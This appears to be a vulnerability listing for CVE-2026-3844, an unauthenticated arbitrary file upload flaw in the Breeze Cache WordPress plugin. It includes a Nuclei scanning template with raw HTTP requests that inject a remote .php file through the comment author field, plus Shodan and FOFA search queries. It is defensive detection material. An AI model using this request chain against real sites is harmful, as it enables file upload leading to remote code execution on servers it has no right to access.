Breeze <= 2.4.4 - Arbitrary File Upload
CVE-2026-3844
Verified
Description
Breeze Cache WordPress plugin <= 2.4.4 contains an unrestricted file upload vulnerability caused by missing file type validation in 'fetch_gravatar_from_remote' function, letting unauthenticated attackers upload arbitrary files, exploit requires 'Host Files Locally - Gravatars' enabled.
Severity
Critical
CVSS Score
9.8
Exploit Probability
37%
Published Date
April 23, 2026
Template Author
theamanrawat, ritikchaddha
CVE-2026-3844.yaml
id: CVE-2026-3844
info:
name: Breeze <= 2.4.4 - Arbitrary File Upload
author: theamanrawat,ritikchaddha
severity: critical
description: |
Breeze Cache WordPress plugin <= 2.4.4 contains an unrestricted file upload vulnerability caused by missing file type validation in 'fetch_gravatar_from_remote' function, letting unauthenticated attackers upload arbitrary files, exploit requires 'Host Files Locally - Gravatars' enabled.
impact: |
Unauthenticated attackers can upload arbitrary files, potentially leading to remote code execution and full server compromise.
remediation: |
Update to the latest version where this vulnerability is fixed.
reference:
- https://patchstack.com/database/vulnerability/wordpress-breeze-cache-plugin-2-4-4-unauthenticated-arbitrary-file-upload-via-fetch-gravatar-from-remote-vulnerability
- https://nvd.nist.gov/vuln/detail/CVE-2026-3844
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2026-3844
epss-score: 0.36512
epss-percentile: 0.98303
cwe-id: CWE-434
metadata:
max-request: 4
verified: true
shodan-query: http.html:"/wp-content/plugins/breeze/"
fofa-query: body="/wp-content/plugins/breeze/"
tags: cve,cve2026,wordpress,wp-plugin,wp,breeze,file-upload,rce,vkev
variables:
marker: "{{randstr}}"
flow: http(1) && http(2) && http(3)
http:
- raw:
- |
POST /wp-comments-post.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
comment_post_ID=1&author=x+srcset%3Dhttp%3A%2F%2Foast.me%2F{{marker}}.php&email=breeze{{marker}}%40test.com&comment=breeze+vuln+test+{{marker}}&submit=Post+Comment
extractors:
- type: regex
name: redirect_path
part: header_1
group: 1
regex:
- 'Location: https?://[^/]+(/.+)'
internal: true
- raw:
- |
GET {{redirect_path}} HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(body, "srcset=https://oast.me")'
condition: and
internal: true
- raw:
- |
GET /wp-content/cache/breeze-extra/gravatars/{{marker}}.php HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body, "<html><head></head><body></body></html>")'
- 'status_code == 200'
condition: and
# digest: 4b0a00483046022100d4b281f718c2e17747719d22b712b42e652c60c1fa9dc5a6a64508dd364e2a5a022100c94026abd03df7a00909bfedfdc6d4933a00d5b1363e9ad50c63e477c8874c88:922c64590222798bb761d5b6d8e729509.8Score
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE ID:
cve-2026-3844
CWE ID:
cwe-434
Remediation Steps
Update to the latest version where this vulnerability is fixed.